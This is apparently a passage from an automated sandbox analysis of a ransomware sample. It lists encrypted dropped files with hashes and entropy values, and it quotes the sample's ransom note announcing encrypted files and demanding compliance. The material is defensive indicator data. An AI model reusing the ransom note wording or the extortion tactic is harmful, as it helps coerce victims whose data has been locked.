          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\ZQIXMVQGAH.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.866772253396331
          Encrypted:false
          SSDEEP:24:xiLMmyYQaw77mMLiYxbSTY8u/2c6o/PnHFc9lfNpilNGYpXADn+zWVd:kIJYQ3L15svVcH3HFcrfbilNG0u+CVd
          MD5:02F39AABE0FACF3AC98249BF392BC64A
          SHA1:137765A52463F0D6B9543232686D1CA4832BF85E
          SHA-256:66A9B291EBDEC183E17A1F8A74AD999C43920A4B5B3E17C2937ECEFB39D06CE6
          SHA-512:2EBD0E5259FF33ABED26F7DC544DCD8FFAA76DE1076B2C247A08230EA80893275A6EC24C88CBB760FACA6CA6F5C0F6355408F27253ADF08A2E8F8707A8E7BBB9
          Malicious:false
          Preview: .. .........N..\..G}YXwV...Fl/....4...V.{....*.tb...m.......ZQ...:Q..+...I.p/.....[0.."G............6.?.#.s..H|.(...S..p.J.lx-v3.).Z.P<6&....0....v..M....6...V.W?%'.|..+... ..L.`.b.{.m:s....KG.kh...........K......$..-..?3..h..o8J..8...^^Hz........w?.D.|.<c.t..x...\....&YQWc.....I^k. X!|.D.9s......-..B.R.Hr.A.........d^E..rB.x.X..*YeZJ5..Q.4.....L......b.."5Q.."V......) ..\......Y%.Qj.|.....{.C.....r...".....-..Z.-.SF..."...,......=.8......T._e.......]6@..n4iX.......I."PE..m.<i.~5....IF...r...%{t).qqe...v[...n......$_ag....!.O..">."T.a. ji...]..zZ..,...!..@..4....6...3,.<0\..X.g'.k.R....f...C....l6.V-....M........-.o{.....v.....=Y.........Rj...../p...T.o..>.p.Lhjo+>B...fb....C.>O.PN.]9}L.F..e..J....&.....(E...'./.0.j.tM$.Z&.....C.c.^..>|...6.7..~......`$-..=..}.y..Wq...S...%.@K..._8zUR<.&.2K..E..:..N..D..'.~!A...V.......7...D\ @...sW.a..T=a.1..{.^.=......%-1.l.!u......$...Ej...........nq.qz.]]..*..P.~,.S.}.+.i.Z.5%..
          C:\Users\user\Documents\ZQIXMVQGAH.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.854343158705853
          Encrypted:false
          SSDEEP:24:0uUZxyKscVIAhPG1zgN83Nc9Wcgh+Li78uIk+p5czbCpXADn+zdwn:0RIp1AhPMgCNc9Wcoai7YLeK9u+hwn
          MD5:169A3D4A7E305A94AF6196EC6216D778
          SHA1:37B74BBA3659C98395B48B3A9CE5F27A99632D95
          SHA-256:A518467C37B34F9EF4D903349749A3CA10866761446E2020B040365D9438121B
          SHA-512:845C98A192C0B586F61D106EF013013DC4D3A109D3DBAFF21B530D7849865B17C6629042D71462C0C5E2ECC663C154E2D5ECBD5836B4376F16C4D06E47CA5966
          Malicious:false
          Preview: Q..Ou.|...ag1|V.....E!...=a..+.RJ.F.G'.Q.H.]mdTA(..bJ...{.........226..i..y......*p....x.%./..(._....[TU#b.WB..~2W..K...Y#9..5].......\[.zGD].........=A;.,(...z....|...r@..D.%D.r...;..<w...$.'...I&.u.;?.{.h^Q.......[...*... ..Pk.N....d>..."Y..t.]t...=..C...I....*..G:/MH.g..Y3.3.fy9Z'/.1{...pRo.....}A..m^.YG6..I.T.af.....1......X.`f....L..t....V...rn.k.H...DPu...@...QF.......Z..J.....S-]W.I....c.iV.......H..1[.|..e..3..iu"0cy...,14w{...u._..g..#.Y.B.G.&u..@....;..^..A.M.j.`.O......7R...T.".1.w....SL.....6.....IY o#.d.~...Rxt..e....Z..X..w.5M.M..q..mMc.\j.......!.EN.T...O...P%_.,K...3.^u...|._.d.../..G....ai.......>Y....M....MZ.z....vNU.8.#)....;>...f.$,4..Qt..g..Y..\...4..q....3M.0.?7...Dd.%V9xl.[.M[.9..G...Vf....Q.....8..N<&.....4).:&X%....B...4.Ra....T.....,.!..].EZ.".6..C.....j......;...B.y.X.Y..f.n..u..lD...n.?^w.{'(.Q...4z..$U.br.R.=..........W`&C.r........)...>.\d..B._q.=.+=..#.....6.2....zC|...k/.Fj..J.Hjy...T...z..D...S.UB..r.i..>.
          C:\Users\user\Documents\ZQIXMVQGAH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.841022616373543
          Encrypted:false
          SSDEEP:24:XuBNUFtqiGZlSM7Wt3cgu4agn6822trTLXADn+zJIr:XuU3KX7i3K4aK6822trTju+Wr
          MD5:E1462FF44D588A3C4D473973A6A8CD9E
          SHA1:CC7CE60DE0CD1B4579AAEF3B97C21DCAA4C33374
          SHA-256:3F19DEA96064DA4A2A6482BA9C1091C6D95A538389F072EAAFA66C4F7AB02AC4
          SHA-512:79DA2EBD27503CD0F9B7D1D7C6DA7A98CE6CE859E08226471CEEE4178AC37BAB7FAFF47ED9FB28AF3536089E13CE487FBC24EF27BB9E2B1EF802C651316A0DFB
          Malicious:false
          Preview: )/r.VE..MR.pL.{p.5..C..0...r.<.'..O....[....ZD..2....Ck...^*:@.7.T.n&......*......5.o.....jc..;a.(^......jK.q...O...g.T..PP}*fz,...Op..I...s..K!.J.k..D.~....BV.....1x.............'".!...?n.`D..V.E...(e...v.,.*..w...Q.=i....Z."D{....9..l....#....n...r[....6,..?.n....v..2.*YNCB..HIF{si.....[.:.2g....dO......308P.....ak_2.F.........Fs....FK...l.0]si..........N`)J....|...uH..J...l..'.k.I.`..z..E<A.XvY{r...eJ...?.z..... ...W.....U..]y.uNV?2.B+zr....(.\}..`......p=O....N...{.Q._.?.8.8S#......f..P..~......).S.n4.t0.&...I...=hA..-*|'..cd)6.n.."2{.../.../.x.#.@.L......v.\..i:.......:pnhc.%.|q..v.U|..G5olNcT.....fl...Q...3&..%.u.l.....4...z......9.(..=.@..[!.+A]R._.+F.f1o.'...Y..5....k.M.p..M...1.L."...i.]....__e.]....8.Q.. ....jy..FK....$-............P}%.F..U...an..}.Z(X2....e....[..j.6..9.A.)d.a.......k..M.D......~)A<...8$.1.vx.....#.m..UO.....Y(.C.PY.d:.8...O9F5.yL....w}jF.......z?^.h.#.]c....-....|c.......1>_vVDW...=p...>...u....../b....
          C:\Users\user\Documents\ZTGJILHXQB.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.847628362017744
          Encrypted:false
          SSDEEP:24:DPEHFWcJ4v3gxgmZrocKfRdZjtAqEv6Lw5onGyhL5cXADn+zqNv5:UWcJ4vEgmaz1Fg6LwExdMu+uz
          MD5:C504742EA8CDDF5F0B2F3F17E5D21577
          SHA1:8FCE573AC0FD14ADCF9C145C1BE41C4DB45B1D08
          SHA-256:86CA0AD08A67A82A1AD8D8BACED30798408DC81C632C6B0B8D28F1773C7E7284
          SHA-512:DF5876016734587DB8EDD19D54C7EB538AAAAB87E6FC996E76ED66410FDE2DE96759E5ADFBE1E8923FC361CF7B444BB722ED25FCBAD0F47C7CE7AAD6CEF7430E
          Malicious:false
          Preview: )%M.m....BT.n...y.f.2e..,...{O....).cx=~....m^%......w67.e.^...+-.j{uu..iH..lqf..{.........N...........+(....C....z...XC....\...K..:._..6..^~/...V.../..IT.t.]....7.mj'Y.E.V.e.)...<..?...SV.G.|V...l.x.)....o.......7;..m.*MS.E...me..mb.u%[z..#s7..hG....).>..L+....K!ZS.K...V@hqGY..! ......lu>..ut.M..=.g..hL."..~.....3%...0<!...*..b..\../%..l4.w.2..4J.6...,.G.mR..l.c..1....'.@.......(Y...r\..L..o......F|?.9:9..kt.x.M\....@..8.........4.................*d..w.......9E0a.G.^9...Rx..%l.-..s..%...1P....gI\:TFG....^ub.....C..ngZ`,.i.........&x...`8...drs4Y.s....`prx....3u.Z..g.W..V./..n"............1.J=..2.,....U.s.....a..-~..9.$.@.\ .....7.XV.b>..6..{.;. .....B.!...X..D.^......9....kv?...._w[.QS.T........x..Zm..0.M.f<....&.L..R0.7..`..A..Unh..~............wD.c...:..'@WM+.....6...d...4....<..\.n..&.D.?......|....U7....t1`.E.Z.h.g......w.f&....-..9.4GB[......;..Y...?..}<"<@..'.;3W.p&<........}.....fJ>...h..J....ia...%.,.!..v......c.kF;...D.u.*O.`X.y...
          C:\Users\user\Documents\ZTGJILHXQB.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8626429526495984
          Encrypted:false
          SSDEEP:24:xX/o4Sgm9/z95oSTb5q3nDc9UdSX/YHdmHCg77TXADn+zjp8f:xXg9J9Es6nDctXAHo9bu+fif
          MD5:0FEB5ECB4E27B3B3016779D760E5B3E7
          SHA1:C2EEA237F061E7DFEDBC14E4321ECA55EAAA3A1B
          SHA-256:BFBA26E793FC98B7735C885F591A9DECA7E1B926EBAEC459CDC00ECFEBF98603
          SHA-512:FA123B3633930A965C19FD4DF43C725AECA194283C856BBC53527A72E34F5BD41233F59C4C9098A57B2CA07C570D13EE9E559CAC718469F984D0114623118F13
          Malicious:false
          Preview: c.\r...>.w...W.v3i.X"..a.mDe...|.-y...[...*......}.w.bf....&n.GU>q-...Z=....j(..'.."c...nS;..H.h..2..d(...|.x...W.s.L..........0..>P......wTI.[..<V<....a.B..H..&fx~J....Q7&.?+..a.'..X....+..{....h..X....>...U".^[.g.....\X.W./..3u..D..]$?2ZEic.S....z.4......q..B...%...J...z..vt.."..=...[|F...a..Z...8.,U..BGd...)..O...eo.PM..!.px'{.....4:.@........C.Dn$..W......#....p.Ge.-.%......]..i....n..^T...F-.{R.O..).Y.B....(.....[.cg.N#'a..I.....2.%...p6...,..dzS..8..D.[...l2HC..d..B\u*.n.oBn.......'..$@...x...'$u3...H.}....L`i...R/..._..`b..c .1....j...d..C..t..Nc8..G\.2..X.D..pR/.|..5?U.....8..W.G...(^!L.F ^..w.......x.&t.......|....G..=...... .K-B<a....L.P..z..0.+..h....,....;.....-!O...W.=..C1.'.:u..[.`.......z+.;......{.(..E'...Z..9.<.p?Z..&A..}.....l..ux..$y.0...,s.F.V...U...Q..gCV..k{JfG..4.0.....E...K..A..t..7.."...?..9..w......*.....Y{j..&1....V...j..E.5R.9.Fd....aN._..V..Lozs.y.."......e....../.\.i...t....`&.H".D...A.!... .K..../P....|..
          C:\Users\user\Documents\ZTGJILHXQB\IPKGELNTQY.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8424289096201685
          Encrypted:false
          SSDEEP:24:2m8BmuGWfiCb1oWhtbEK466/RlQC07idsiC9XADn+zr6:+kKf7BPhBIt/d07idsiuu+v6
          MD5:7B56875C9F11E5A960FFAAC64C7F74D5
          SHA1:9632C2F3430169C0164820BAE0ADE87501B12697
          SHA-256:99BFB0801FDE0AC7ECC50F3A16CEACCA9FA27593335C0FF5AAF0639A5D744503
          SHA-512:F6F67128A26BB60DAD7F7F4E529471EEAF78F81B302D7ADF87F20821AD281BF898C9484988147120B894289AB51598F2B42473150D8D2FBE183506DD9F5A5E4E
          Malicious:false
          Preview: ...........).....T........W0..$~..s....bM.U..sW..........wk...7...jV6.C.d4l.g......H.5m...AiN{.o}.4g?c4.PG...@.=.^.....u...9..0.}......;...+.R.>y...M...@-r$F....R.;fb.\6..{2...^.......t.VQ.fq.bc.\..Vk;@w.5.?:M1....5......t..b.......GBi.......Q.?g...<..$..~.e.......'.....o..<Hus...Aa.g....\_.......u .aCtm....I..TD.......<....t..A.Q.T..R]....i.HK."3....g.r.O.e]......z..EN."KF.I....a../...F ....m....\.Z..K.l.......?..e}.........q.j3D.1%.T.~.Wv8V"..97...a .V!.6)k.....(W.].B..ND.*.!.e...L}...5KD..g...B..._.L.f.8i....^.[#...>..UL.....h,...6...y1.Z...Hh...O.c7.M.3......T0.a.r.j..L....@..b..."|.A..Z...\ijW....X.x..f.../.c.*...#....;+.....B.s.sT.V.'l.\........4.yN.$f4.!.08c..N..+..:.G.fl.9.{e}.Z....0HW....O O ...z......E..1 ...L*d....O....a...............Z..Uv....{.1.'.w.9..Ro....tB..!..C....&..D..Pn..+q..s.AUT.<K..........x..q.t.,t.y...=,...hE.....yV.;Z.J....A.......m..6..&..A...!.I.6.%..C4....S..@.....,Q.x.=..6.].>..[.v....8..nF..l....#.V...\
          C:\Users\user\Documents\ZTGJILHXQB\PIVFAGEAAV.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.865892169050325
          Encrypted:false
          SSDEEP:24:vImY2FKQWgZA4VovoaVGI2YnNYTLrecXR2McHqbvG0XADn+zvIC1:vIXsKQW34so5DgKbvG0u+N
          MD5:B913571FBC99711AFD965135374AB088
          SHA1:C0549D112D769964736ABD7CE1E14E6305926B1C
          SHA-256:CC7362CC6D85F244E9B396A1E531C103053B083DBC8EF9F5ECE4A0211E70D083
          SHA-512:F123A8178EFD0E0F2DAFE8CF75BAF6131D80DF12957857E4EF0AB8605AFBAB559BD2318D5356064B4B1B583B17FEF8E48FA3DBF45D7302675091DDC60AC00196
          Malicious:false
          Preview: cy.`.......p..d...m...U.#.8.rV.C.....r..8r...x/eXZ.>+...b..8"...C1ib....DoC.@...h1.N.EO.sY5..+2]...I.?.....n.S2.-....S...X.0...`-..D.N...v...O....)B....B.S..,:...\..&..Kr .Fg 0..;.:0..-.W6.1.......aBg@..76)~.....*.-8.s{.j.6.2.(..u..p...ds.ac.....X....-.m...=e....5.3...9......@p.#...!...j..<_.....3.%0/r..E>+..eY..l.f....._.0...?.....JxdfL....q......&qj.........H.O.K{....D..K.c.....#........,_,D.4$y.....+.qk..h~~M....3.i7.....k..t.}...|.._U....#........F.........k.2p.2........<..e..f0.4.%I.;..U..I..........jh>.T.G.G0.=).je J.>H.......[.k?:...UK.._Q|.s..5.....|f.a..r......G.!v$E.....~..>.P.#N.l"4Fg.M.uSo<S%k.;/.]Q...]s}$.{1.p.D...?..`O'^+{.2p.....zj.Vc....>..5.fh.m.w.\U..%......d&A.zi...O.Z....../..1.{......a.M.G.5..W'J......q..4..g....P.&......n"..4.Sq.O...j.{.....{ip..iF..)OaT....t)z..........'.[.......u*?.=....1h..Mb./..o.l_m_.5.....<r....0.&@.eM.R.d:......!f.6..u......3.({D.Rf~c!M.\6a...r..c].o.....UG...s...w...Y..!m. ......3....@.m.sX4.....Q.6.[
          C:\Users\user\Documents\ZTGJILHXQB\QCFWYSKMHA.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.855500430124044
          Encrypted:false
          SSDEEP:24:rCEkL8plTZOR/5nC3t65vngUVSL1+nS+CsermXADn+zSDdW:ruYlsfJ5Zw1+nS+Cserau+OJW
          MD5:D6DA9F4F86A0B09C05E5D57514252044
          SHA1:3767434FFD654CABB371A3C8AD27909BC02AF437
          SHA-256:898EEB0EE4E265F68D86B311AB0F73859617149BA0E568CF4D3F33C50B581FD0
          SHA-512:6B09C42104586A6CA26D20528FF1B2B66B70EF1B69CD8E428DF0140FF339476CB48A7B8C7200850B848DD86CD82E4E3CE69C86A85D29FAFCA5AC9A5131484E18
          Malicious:false
          Preview: .J7.'..@..:.N.kp$t..@..............O/....n.....Y....U-..`.l..K.=......(....qG....[..H.,.o.. ....]vTiM0#..3.....q....... .......Sk.z%M..=>+x...Z..q%....!..o.....;.>.....2..w/.Un..F"L.u.(:.....n.B<..l...FU.[.9.......!...z>...5..4.$.....f.v.A.G\}..`.}..O........S.f5...>......>.. .......+....#.t..T.........t.H....{.....z....B.T...?.lf6......G......VBxa~....1.....{......./..........g..<1.7.e..X.h.;..a..{...4...\...Ml0.......k..?.(.v&..yK.I.z..%..@..%}.GC./RM.l..7.....F.u4......7..F.....i.n..I.........O9..k...e...t..?...V..^.....3,.'...N\.....#l.....N..'..2c..3.....,[,aU.....=27..^.6......U.x0...s.....L2......D3.`Q..fT.......Rz4.f..#/a.x.....cj....I_Z..ty(.*..........y.y.W.KEF,?w......-..[.J..7.lm.$._.1.0...X..B..^......+w.V....P....@.s..y...r`8GV..f.rJ...E.7I6E..x..EWM@.}.....)x%n]Tjh..h..s...e../[Q.1..[.T.m.P.v..:..D1.t.e[.Q.N..T.f.....`.66.[c...pg...vc0"1..9...`...[.p.H./&.P#b.....e....J.i&m.,.H..\.....\P>...Z{..Ori...Ea...>..+1a.~W..
          C:\Users\user\Documents\ZTGJILHXQB\UOOJJOZIRH.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.869632347136298
          Encrypted:false
          SSDEEP:24:splfgnYZtIeFsfA2nC23b0ceHMxVkc4EqoJLEppXADn+ztqa:spluYUPfALMOc4EPk9u+pqa
          MD5:E427D2096060955EFF561CD903A6C04D
          SHA1:FDC0BB3E172920DA91F31233531C8D97701DCAD7
          SHA-256:A39FC706854476F1458DD1AC007008F1343134116C2978114BA0CC0891520F1B
          SHA-512:5E7F44592A16DE18C844E4923DB8CF6B57DD7E4948F251C8001C505DA29C8827812F03A835BBB86C498D3F6CB85ECE137983B64E3392292FFF61B387731013DC
          Malicious:false
          Preview: .E.d.....dIL....F.z.$....4b.t.;V...,...HV.U(U.._....<gc.f..~!.r.B.@..n....?..[.....6.... QfD...i.......A.P(T.x. `...'.#....J./I.0.......\.e.u..#.L..s....z.r.w6jZ.x...\....#n...w,.D...i<<.*...#}N.R.m.0.C....NP.&..dhHYY.....P.9.t..'...Y.L4>.H..:&.f..B...U.)T.....5..o...D....0.$K. .h.6(..OX.....s...l.Yc.'.V.......'.D.k.w...r3...)0....*7..S..1..Y.%..-].K....UM....'...1...k#..d..ey.^C.....N'..$./qF.\Y.o.....5..}..~..@...].......-b.....c%.g..}D..T...,.D.p...W.E..6.R.!<...+..G.......o..^.}.p..]...i.7I...3..[.Z..s.{V.*5.X.q...U..B......F.>.'.q.z2..{..9.....]D...[T..._.;;......j9.....T.A.>F..,2W?5.s..G:..o_F&...B.x`q%.~`*...9.Vx....y.5.E..O=......-.1..J..g..U.Uo..*W~..~._..,.]`R..7.R.^.l.o..D-Mc|..........~.......m~.aiz-i.....$....L..........EEc"M.nE..k...r..;.J...8.k|...xL.U..O.L.;=..u...S.;[..w.<j..Hrg.,...o3.:...LN.).....+8.yr.?.>.....-.<.F.#..XI..../..Yq..Y<h#,.:kA'.v.I..b........0.>....\..bEB9.i....,...\<.ak(.Bi.....R....a./.[.S.r.S~%....!...R.
          C:\Users\user\Documents\ZTGJILHXQB\ZQIXMVQGAH.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.834754546919295
          Encrypted:false
          SSDEEP:24:bdFR1fVmbJ8R8P2JC4j2nJ3hcBpmkXF0c/GfL3u8odYyadugdXADn+zrQa:/VmbJ8CT4j2nJx0pmfcAuYyE5u+l
          MD5:1A8C23B01A19B42450B6E447BB5860C5
          SHA1:055EDE9DD919E41DBF0642224A23D24E1EB9DFB5
          SHA-256:A2B81DCD601414C612F2D452097FFC5F3829EE10F45E9DF2E456DB0F5CCD4689
          SHA-512:4B23B194984A06B26FFE411E140E6486430339448B86992C07E168C5914F06EC94F8465107055132908BB6C59D1B3A5EFF7AA51B369C1921B61F83D06E8CAB33
          Malicious:false
          Preview: 3..BYK7.eO.#.....1hz.'R...b?....&......rH.-.....N.SS..6.42.....*.|..<.....z.I2=YZ...%............wp.?Xen..sN%I..}>G.q#......~...0:Q.R.S}.u.X.I'..[.y....{.Q....E..t.i.....!8.z.h.ADG._.I..b!f..~#....>.R..`Q.y.L...Z..z...........Wy2?..x]g..h...;[Oq....B......K*.c?....uu..<CTu..qo\.S......o.._uq.F..q.Fa...b".xp..K.ZQY.S.GB...,3..RW{h..{....S.. .4./.....+.S..U........+.T.<..)q...}..I.r...+....(.A..*...,.p..........k.%....#..+..U.S.CI..P8:.I.RP;.I...f~....../..LG.X....m.0y.....JH...`.y]..+.".2..r0.a.y..i......]+A.....$N0\........h.h.%e.W...}....kUJ.t..p!7.. ..D.....Fa....{k...x.D...C.S...kE..P...=.......v..R...h...k.O`+.A"..}M.....b..Lj....h.......q..M...hR.T>..5....L.r.r....BSl+.i.[.B.3.O..... ....}..F.Mk..J..... ...m.J.g..F.D....}..4C.VCt.....:%.j=....B..8..]...a=..B....A"y...:[`v..O.=......I... X......obA...F..9.hV..K..{.#..D..J........4.2Rr.....2S..Z..?m...........[........1.._<.ip.|/%8)....2xt.....ma.o... .M.m....z..09w.BXv..8
          C:\Users\user\Documents\ZTGJILHXQB\ZTGJILHXQB.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.850365783842852
          Encrypted:false
          SSDEEP:24:R8B/3yAkWv3V2JlmcvN/9hp1APYI1J72s+NcZpL/bNLXADn+zTF:ekGlarF9hp1Gn750cZpL/b9u+t
          MD5:FBE487885E9CE5751C916D024F6CD7DC
          SHA1:7F101786A2066945417D28FBF24E58448C092712
          SHA-256:7E0C074708A54B22BCE32B59B162013A2FBF1BBA7E33DE70E67B4A5B05BFA33C
          SHA-512:CF20414D68492BE5CB02CEC28CC59B79BE423F9489F64D3E05EAE36F57938CE972E05FAC5B4C8AD213E7313A6D4B475597E3D1B3F4C3866AFC54EFA1A5C56AE6
          Malicious:false
          Preview: W..d4:i.3]?.(.r.....t.A..(.f..T.Y.[.E~S0.X...q..zWWN.../..h......A.D.X>...'yk(.. Cn.PlB9/..vn.my'..-..d.Rc"......X5...Dd.h,Cs..?g;Q....@}....G.u.!....v.......[..>>.9>....*.x...._k?|..-..rX.p.+...Ac~...Z,YLe.=.X..a......<...K...lbU..$.....MbLm$....>m...zp...Mg.1 ....:h.c.k.VW).@~.O.,.o.=.!....g...1.Le...c].......-..KMq....N...]..N......q..}.5......f.Yb.?z?.,oy...V........}.G3..Wu.R......#... .].&...?1....y....@.8r.....Ga.<+..%.(...R.L.$....`...v.^.@..I..4.s.r&c..K.....&.2.......b...k...|k..T..;.e_.O#u.N.....DP....o...P.....d..3..x.......,._....=.&....h........ky...9..nf...mb4.Y.i.Ib.D..D.r..?...:..vR.p............96i.J7..zg..I..C...*.......6...N..}']....[l.p9..Z_..(...{[......A.d.G'..3m8R.H..O.5...o....0....p....u......'..ci..z.>)..h.v..Xh.^..k....E.....Yb....{.@ .....v.%..g.j.....L....h.8c.b.;..z..........b..u.D.qi..m..(w.[.6.Q...a-...n..9..p.TQW.....q..-,..K....Y..R_.....8X\IJzv..}h[.oH......K.h.).x6.I.P.].)..h...,MNfTr]....Z@..E......a
          C:\Users\user\Documents\ZTGJILHXQB\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE text, decoded):
          ---=== Welcome. Again. ===---

          [+] Whats Happen? [+]

          Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
          By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

          [+] What guarantees? [+]

          Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Documents\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE text, decoded):
          ---=== Welcome. Again. ===---

          [+] Whats Happen? [+]

          Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
          By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

          [+] What guarantees? [+]

          Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Downloads\CURQNKVOIX.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.864144727218547
          Encrypted:false
          SSDEEP:24:kOUSH9tUJrtgaSwVVGV/gbXkgrnTqadT5x7vXlgHR5T5cg3XADn+zw:HfQNSL/6Rr+ad1VKHRRju+c
          MD5:9D9100E13CF329C4073924CE008976F6
          SHA1:9691CEED3B44CA94A1B42AF409C098EA072E62BD
          SHA-256:13417F8203E38200B297715742C09699BCFD5B458DE65F990C61C435E5CCF577
          SHA-512:6C575BC82FC45515DD147F12305E7385B437A0318D572298C9F2AD9AE83C7B8AB055E986E9CF8669ECCE975F7BA11F2F87A593AF52336EDBAA658D187FD828FC
          Malicious:false
          Preview: .Y...z......k.1.......C...$...J<..5C.v..........)>]...}.a.q...`^4.,N.;+..J.3q.OI.f..W].!.aeM...6t.2...e(.@R-........G..@=G....?...6.k...PnJ..E>....!8.......!....|....)..1.m.{....r)&.Y'y4i8.~.A^..%+s.....[z.../6D..V...y..~A_w\}mO.f...Q..>.j...s7._e......O.].-A..4.D.P.fJGf........v...l..0g8...>..8.....5*'.*C.G..U=...I._.w.[.}....o..3.......'c..........Eto...%..,....H.3..6J..'HX..d.'..RR.#.ZYx:;..#...E...x......a./fc.......\.-.......3.;.|^<B..}.....E..{^.wi.....[....W..$.Y7...;.?..3...h..mY..2M...-...............=...Z...w>Zw...h...U...@.C..,N.0\.XX.q]....^....KX...@..}.....LR.$.8....r(!.1O#...D.,.oNP..&.Ze....>..>g).<.eq...V..j.'......M\.b.K..5..Q......$i.pE.?8c.k...V....,.a..&J1.....{.(..|.X.S..Y..KT.....RY..jX....`.*."Y.Qs,<].'...A...Q... .[..<...._..T.{..[$.H.\.f.0-.....mJ{..$...c....W..ts. wF......r.._.$`..\..$..P.$....p........=FAD.o...N.x.C<...c/......)w.f.D.......L....../..&L.H.U..w.M..."...meOD.A9.F.P...h..e..N....>.#g2M.
          C:\Users\user\Downloads\FENIVHOIKN.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.841431406096934
          Encrypted:false
          SSDEEP:24:5I1lOpKQcfeQu89FS1uTJxN7pBtcCCzzWyXADn+zB3ss:54lOj0pJxN7pBuRHXu+b
